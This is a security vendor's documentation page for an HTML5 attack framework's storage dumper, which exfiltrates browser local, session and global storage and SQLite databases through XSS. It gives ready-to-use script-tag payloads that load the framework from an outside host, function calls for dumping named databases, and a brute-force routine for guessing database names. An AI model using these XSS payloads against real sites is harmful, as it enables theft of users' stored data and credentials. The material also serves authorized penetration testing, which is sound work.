HTML5 storage dumper

Local/Session storage

Some websites store information in session/local/global storages. To show how an attacker can exploit this and send all of the existing storages (Session storage, Local storage, Global storage) to the attacker's server using XSS, use the function html5storage_dump_storages().

An example for Proof of Concept

<script src='https://appsec-labs.com/html5/html5_attack_framerwork.js'></script>

<script>alert(html5storage_dump_storages());</script>

This is a part of the HTML5_attack_framework.

SQLite storage

To collect the SQL data, you must use SQL Queries, the problem is that their results run as a kind of a-synchronic (not synchronic, and not a-synchronic). Therefore, the exploitation is a bit complex. The function updates a global variable named 'dump' and you can collect the information from it. An additional problem is that you need to know the database name- the HTML5 exploitation framework uses a number of methods to find it.

The basic exploitation that collects the local/session storages and the SQLite storage is

<script src='https://appsec-labs.com/html5/html5_attack_framerwork.js'></script>

<script> html5storage_dump_all();

IntervalId = setInterval("if(is_dump_finish){document.write('<pre>'+HTMLEncode(dump)+'</pre>'); clearInterval(IntervalId)}", 5000);</script>

This is a part of the HTML5_attack_framework.

This basic exploitation fetch with:

sqlite_dump_database_by_obj – all page objects.
sqlite_dump_database_by_dict – the following database names: 'sql', 'SQL', 'DB', 'db', 'SQLITE', 'SQLite', 'sqlite', 'DB1', 'db1', 'DataBase', 'DATEBASE', 'sqli'.
sqlite_dump_database_by_bruteforce – search for all 2 low alphabet characters without prefix/end fix.

To dump a specific known database, use something like

sqlite_dump_database_if_exist('my_data_base');

setTimeout("alert(dump)", 500);

You can also use specific functions for specific exploits:

Function sqlite_dump_database_if_exist(name) – receive the name of a database, and dump it (to the dump variable) if it exists.

Function sqlite_dump_database_by_dict(dict) – receive a dict (for example ['dbname', 'database1'] ) and fetch the data if it exists.

Function sqlite_dump_database_by_obj() – check all the variables of the page, and if there is an object to a database, without knowing the database name, it will fetch the data.

Function sqlite_dump_database(DBname, DBobj) – If you know the database, use this function. The DBobj parameter enables you to send an object that is already connected to the database, but it is optional.

Function sqlite_dump_table(DBname, table, DBobj) – To dump a specific table. The DBobj is optional here too.

Function sqlite_dump_database_by_bruteforce(chars, str, prefix, endfix, cur_char, cur_change) – Search databases by brute force. Be aware that it takes a few seconds…

As an example of a run, you can see the following code

var alphabeta = "abcdefghijklmnopqrstuvwxyz"

var alphanumeric = "abcdefghijklmnopqrstuvwxyz0123456789"

var capandlittle = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

var maxlen = 2;

var prefix = "";

var endfix = "";

sqlite_dump_database_by_bruteforce(alphabeta, " ".repeat(maxlen), prefix, endfix, 0, 0);

All of the above functions dump the data into the global variable 'dump'.

* Name:
* Email:
* Phone:
Company:

Application Security

Our Latest Tools

New Tool Launch - Belch 1.0.13

Check it out!! (click here)

New Android Penetration Testing Platform-

Our Books

Managed Code Rootkits

by Erez Metula

Contact Us

You are here